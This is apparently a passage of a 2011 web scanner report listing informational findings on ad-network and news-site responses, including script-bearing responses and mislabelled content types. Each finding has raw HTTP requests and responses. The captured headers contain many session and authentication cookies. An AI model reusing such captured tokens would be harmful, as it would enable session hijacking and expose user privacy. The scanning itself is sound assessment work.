Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; cd=false; ruid=154dab7990adc1d6f3372c12^10^1304954976^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=12590^2&13549^1&5032^2; csi2=3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1&5032^3; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=58982; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3187892.js^1^1304955417^1304955417&3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 15:36:57 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 1535

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<script type="text/javascript">
rubicon_cb = Math.random(); rubicon_rurl = docum
...[SNIP]...

24.18. http://share.meebo.com/cim/whitev4.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://share.meebo.com
Path:   /cim/whitev4.html

Request

GET /cim/whitev4.html HTTP/1.1
Host: share.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=7c2126d393b99323557e; tcookie=299d841e219be7e7276c%26true%26ic22%3D1%26ic19%3D1%26ic17%3D1%26ic16%3D1%26ic12%3D1%26ac17%3D1%26ac16%3D1%26ac14%3D1%26ac12%3D1%26ac10%3D1%26pc1%3D1%26pc4%3D1%26ic9%3D1%26ac5%3D1%26ic3%3D1%26ic1%3D1%26ac8%3D1%26ic5%3D1%26AG%3D1%26AK%3D1%26AM%3D1%26AQ%3D1%26ac18%3D1%26ac2%3D1%26ic23%3D1%26pc5%3D1%26ic13%3D1

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Mon, 07 Feb 2011 19:27:40 GMT
ETag: "2047208199"
Accept-Ranges: bytes
Server: lighttpd/1.4.19
Content-Type: text/html
Cache-Control: max-age=135308
Expires: Wed, 11 May 2011 05:10:38 GMT
Date: Mon, 09 May 2011 15:35:30 GMT
Connection: close
Content-Length: 350

<html><body style="margin:0;padding:0;"><script>
var url = decodeURIComponent(window.location.hash.slice(1));
if(url && /^http/.test(url)){
   if(window.self != window.top) {
       document.write('<ifra
...[SNIP]...

24.19. http://uac.advertising.com/wrapper/aceUACping.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uac.advertising.com
Path:   /wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNDk1NTQyMzsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=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; F1=BQmCI3kAAAAAYm1CAEAA8DABAAAABAAAAMAA8DA; BASE=Rgwq+yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp15Ixv1d4QM!; ROLL=boAnr2C+ORAgA1G9JNnz8yH!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Mon, 09 May 2011 16:30:27 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:39:14 GMT
Connection: close
Content-Length: 2793

<html><head></head><body><script type='text/javascript'>    
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

24.20. http://wvue.web.entriq.net/nw/dpm/loadplayer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wvue.web.entriq.net
Path:   /nw/dpm/loadplayer/

Request

GET /nw/dpm/loadplayer/?instanceGUID=5ED1F7E8-1A85-BA06-44C9-9FD864CC049C&affiliateGUID=&mt=1&playerID=DayPortPlayerCallBack.DayPortPlayer_0&domain=wvue.web.entriq.net&v=2011491537 HTTP/1.1
Host: wvue.web.entriq.net
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:15 GMT
Server: Apache
X-Host: w4
Vary: Accept-Encoding
Cache-Control: max-age=60
Expires: Mon, 09 May 2011 15:38:15 GMT
Content-Type: text/html
Content-Length: 59938

/*
   Player TYPE 2
   DayPort, Inc.
*/
DayPortPlayerCallBack.DayPortPlayer_0.embed = function()
{
   this.version = "201001251308";
   
   this.imageDomain = "wvue.img.entriq.net";
   this.domain = "wvue.web.en
...[SNIP]...

24.21. http://www.fox8live.com/images/phone.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /images/phone.png

Request

GET /images/phone.png HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:44 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
ETag: "0e287457fe9c71:0"
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:06 GMT
Age: 38
Content-Type: text/html
Vary: Accept-Encoding
Px-Uncompress-Origin: 1454
Last-Modified: Tue, 28 Aug 2007 14:25:24 GMT
Connection: keep-alive
Content-Length: 1454

<html>
<head>
<title>Oops! Page Not Found.</title>
<script type="text/javascript" language="javascript">
<!--
function RedirectToASP()
{
   var url = document.location.href;
   var pathStart = url
...[SNIP]...

24.22. http://www.fox8live.com/sites/scripps/images/rounding/tab-bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /sites/scripps/images/rounding/tab-bg.gif

Request

GET /sites/scripps/images/rounding/tab-bg.gif HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:09 GMT
Server: PWS/1.7.2.1
X-Px: ht brf iad-agg-n30.panthercdn.com
ETag: "0e287457fe9c71:0"
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:37:27 GMT
Age: 102
Content-Type: text/html
Vary: Accept-Encoding
Px-Uncompress-Origin: 1454
Last-Modified: Tue, 28 Aug 2007 14:25:24 GMT
Connection: keep-alive
Content-Length: 1454

<html>
<head>
<title>Oops! Page Not Found.</title>
<script type="text/javascript" language="javascript">
<!--
function RedirectToASP()
{
   var url = document.location.href;
   var pathStart = url
...[SNIP]...

24.23. http://www.fox8live.com/sites/wvue/images/promos/fox8insider.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /sites/wvue/images/promos/fox8insider.jpg

Request

GET /sites/wvue/images/promos/fox8insider.jpg HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:59 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
ETag: "0e287457fe9c71:0"
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:39:28 GMT
Age: 31
Content-Type: text/html
Vary: Accept-Encoding
Px-Uncompress-Origin: 1454
Last-Modified: Tue, 28 Aug 2007 14:25:24 GMT
Connection: keep-alive
Content-Length: 1454

<html>
<head>
<title>Oops! Page Not Found.</title>
<script type="text/javascript" language="javascript">
<!--
function RedirectToASP()
{
   var url = document.location.href;
   var pathStart = url
...[SNIP]...

24.24. http://www.therepublic.com/assets/images/ui-bg_flat_75_ffffff_40x100.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/images/ui-bg_flat_75_ffffff_40x100.png

Request

GET /assets/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 15:37:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 539

<html>
<head>
<title>404 Page Not Found</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                
...[SNIP]...

24.25. http://www.therepublic.com/assets/images/ui-bg_glass_65_ffffff_1x400.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/images/ui-bg_glass_65_ffffff_1x400.png

Request

GET /assets/images/ui-bg_glass_65_ffffff_1x400.png HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 15:37:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 539

<html>
<head>
<title>404 Page Not Found</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                
...[SNIP]...

24.26. http://www.therepublic.com/assets/images/ui-bg_glass_75_e6e6e6_1x400.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/images/ui-bg_glass_75_e6e6e6_1x400.png

Request

GET /assets/images/ui-bg_glass_75_e6e6e6_1x400.png HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 15:37:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 539

<html>
<head>
<title>404 Page Not Found</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                
...[SNIP]...

24.27. http://www.usatoday.com/_common/_includes/_community/taboola-async.ssi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /_common/_includes/_community/taboola-async.ssi

Request

GET /_common/_includes/_community/taboola-async.ssi HTTP/1.1
Host: www.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D534.24%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=
If-None-Match: "f27432dd5cffcb1:0"
If-Modified-Since: Wed, 20 Apr 2011 13:14:22 GMT

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 20 Apr 2011 13:14:22 GMT
ETag: "f27432dd5cffcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:28 GMT
Content-Length: 3145

<style type="text/css">
.vidiscovery-note {
   display: none;
}
.more a{
   font-weight: normal;
   color: #00529B;
   float: right;
   font-size: 11px;
}
/*
.taboola h2 {
   background-color: #f0f0f0
...[SNIP]...

25. Content type incorrectly stated
There are 31 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly, analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


25.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

Summary

Severity: Information
Confidence: Firm
Host: http://480-adver-view.c3metrics.com
Path: /c3VTabstrct-6-2.php

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-38-58_13277019711304955538; expires=Sat, 07-May-2016 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_13277019711304955538; expires=Mon, 09-May-2011 15:53:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...

25.2. http://480-adver-view.c3metrics.com/v.js

Summary

Severity: Information
Confidence: Firm
Host: http://480-adver-view.c3metrics.com
Path: /v.js

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /v.js?id=adver&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:53 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1008
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3
...[SNIP]...

25.3. http://a1.interclick.com/getInPageJS.aspx

Summary

Severity: Information
Confidence: Firm
Host: http://a1.interclick.com
Path: /getInPageJS.aspx

Issue detail

The response contains the following Content-type statement: text/html; charset=utf-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJS.aspx?a=51&b=50020&cid=633862074462683028 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; Li=1=734247&30=734245; Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&10654=734265

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Mon, 09 May 2011 21:38:16 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:16 GMT
Content-Length: 6352

function isSilverlightVersionInstalled(version)
{
if (version == undefined)
version = null;

var isVersionSupported = false;
var container = null;

try
{

...[SNIP]...

25.4. http://a1.interclick.com/getInPageJSProcess.aspx

Summary

Severity: Information
Confidence: Firm
Host: http://a1.interclick.com
Path: /getInPageJSProcess.aspx

Issue detail

The response contains the following Content-type statement: text/html; charset=utf-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJSProcess.aspx?a=51&b=50020&cid=633862074462683028&isif=f&rurld=www.csmonitor.com&sl=true&dvp=http%3A//www.csmonitor.com/Business&rurl= HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; Li=1=734247&30=734245; Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&10654=734265

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ucap=sl=1; domain=.a1.interclick.com; expires=Thu, 19-May-2011 15:38:17 GMT; path=/
Set-Cookie: FC_51=128531=17622395:1; domain=.a1.interclick.com; expires=Tue, 10-May-2011 15:38:17 GMT; path=/
Set-Cookie: IFC=n=1&w50020=1&a128531=1&e=634406242976940565; domain=.a1.interclick.com; expires=Tue, 10-May-2011 15:38:17 GMT; path=/
Set-Cookie: Aqprep_Banner300X250=128531=634405378976970568:50020; domain=.a1.interclick.com; expires=Sun, 07-Aug-2011 15:38:17 GMT; path=/
Set-Cookie: Li=1=734265&30=734245; domain=.a1.interclick.com; expires=Wed, 08-Jun-2011 15:38:17 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 836

